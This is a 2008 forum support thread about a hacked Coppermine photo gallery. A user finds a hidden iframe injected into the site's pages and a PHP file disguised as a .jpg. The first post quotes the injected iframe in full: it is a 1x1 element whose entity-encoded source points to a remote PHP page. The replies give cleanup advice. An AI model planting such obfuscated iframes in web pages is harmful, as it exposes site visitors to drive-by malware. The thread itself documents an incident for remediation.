Topic: iframe in our cpg installation (Read 2070 times)

Joach · « **on:** April 19, 2008, 12:12:30 pm »

Hi,
today I discovered strange code (iframe) right behind the body tag in our cpg 1.4.15 installation. The code is:

<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

I believe this does not belong there right?
I fixed manually upgrade 1.4.17 and start now to upgrade to 1.4.1.8
Any further advice is highly appreciated.

Joach

Joach · « **Reply #1 on:** April 19, 2008, 12:26:55 pm »

In the cpg folder "userpicts" I discovered a file "5563131x.jpg".
When I open this file there is php code inside.
I post the file code as (.txt)-attachement.

Thanks again for advice, Joach

skyone · « **Reply #2 on:** April 19, 2008, 12:29:56 pm »

read this topic http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

you gallery was hacked like mine was. You will have to sanitize all your files.
almost every single php file on my gallery had the I frame, remove it. Aso all the html files on my main website, I just upload them again. I had a file 45563131x.jpg on my album folder, I deleted it. Delete your 5563131x file .The hacker put it there
Check your gallery configuration too as this hacker changed some settings.
You should change your password too

News:

Author Topic: iframe in our cpg installation (Read 2070 times)

Joach

iframe in our cpg installation

Joach

Re: iframe in our cpg installation

skyone

Re: iframe in our cpg installation